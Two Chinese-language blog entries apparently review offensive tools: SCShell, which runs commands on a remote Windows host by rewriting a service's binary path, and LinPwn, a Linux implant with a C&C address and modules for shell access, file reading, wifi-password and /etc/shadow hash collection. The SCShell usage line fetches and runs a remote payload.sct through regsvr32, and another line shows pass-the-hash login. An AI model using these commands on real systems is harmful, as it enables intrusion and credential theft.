tools Lateral-Movement      2019-11-27

一、简单介绍

        SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。


二、安装使用

        1. Windows 使用

SCShell.exe target service payload domain username password
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服务名

 

        2. Linux 安装使用

pip install impacket
git clone https://github.com/Mr-Un1k0d3r/SCShell
cd https://github.com/Mr-Un1k0d3r/SCShell
python scshell.py ./administrator:cxzcxz@192.168.52.133 # 执行cmd模式,没有命令回显
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash验证


三、日志痕迹

        使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息





tools Linux      2019-11-10

        无意间看到一个帖子推荐的工具,自己下载本地测试了下,感觉还有很大的改动空间。项目地址:https://github.com/3XPL017/LinPwn,工具本身提供了Linux上执行命令、读取文件、下载文件、读取用户hash和wifi密码、下载LinEnum并执行等功能。



一、编译运行

    1. 需要在LinPwn.cc中修改C&C地址和端口:

    2. 编译生成二进制工具:执行./build.sh --default

    3. 控制端开启监听,并在目标上运行生成LinPwn(2019年11月测试Virtustotal没有检测出任何问题


二、功能演示

    1. 查看所有功能模块,输入模块名进入,exit退出模块

    2. Shell 模块:执行命令

    3. Readfile 模块:读取文件

    4. Enumerate 模块:下载并运行LinEnum,用于本地信息搜集和提权(运行时间有点长)

    5. Download 模块:从指定url下载文件(进入模块,输入下载的url)

    6. Wificredz 模块:收集保存的wifi密码

    7. Hashdump 模块:收集系统用户hash(读取/etc/shadow内容)


三、评价

    1. 该工具功能不是很强大,基本上每个功能都是一条命令都能解决的

    2. 实现代码简单,可以根据该工具的代码框架,逐渐增添新的功能模块

    3. ……(编不出来了,以上仅个人拙见)